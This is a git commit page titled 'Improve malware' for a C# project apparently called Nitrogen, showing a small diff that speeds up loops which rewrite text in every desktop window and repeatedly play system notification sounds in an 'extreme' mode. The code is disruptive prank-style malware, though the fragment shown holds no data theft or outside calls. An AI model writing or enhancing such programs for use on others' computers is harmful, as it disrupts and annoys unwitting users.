Improve malware

This commit is contained in:
Vichingo455 2024-12-22 15:07:46 +01:00
parent 9d3b0d12de
commit 860d5e00d7
1 changed files with 11 additions and 7 deletions

View File

@ -78,13 +78,13 @@ namespace Nitrogen
while (variables.textchanger == true) while (variables.textchanger == true)
{ {
EnumChildWindows(GetDesktopWindow(), new EnumWindowsProc(EnumChildProc), IntPtr.Zero); EnumChildWindows(GetDesktopWindow(), new EnumWindowsProc(EnumChildProc), IntPtr.Zero);
if (variables.extreme == false) if (!variables.extreme)
{ {
Thread.Sleep(1000); Thread.Sleep(1000);
} }
else else
{ {
Thread.Sleep(100); Thread.Sleep(10);
} }
} }
} }
@ -459,6 +459,10 @@ namespace Nitrogen
{ {
PlaySystemSound("SystemNotification"); PlaySystemSound("SystemNotification");
} }
if (variables.extreme)
Thread.Sleep(1);
else
Thread.Sleep(500);
} }
} }
} }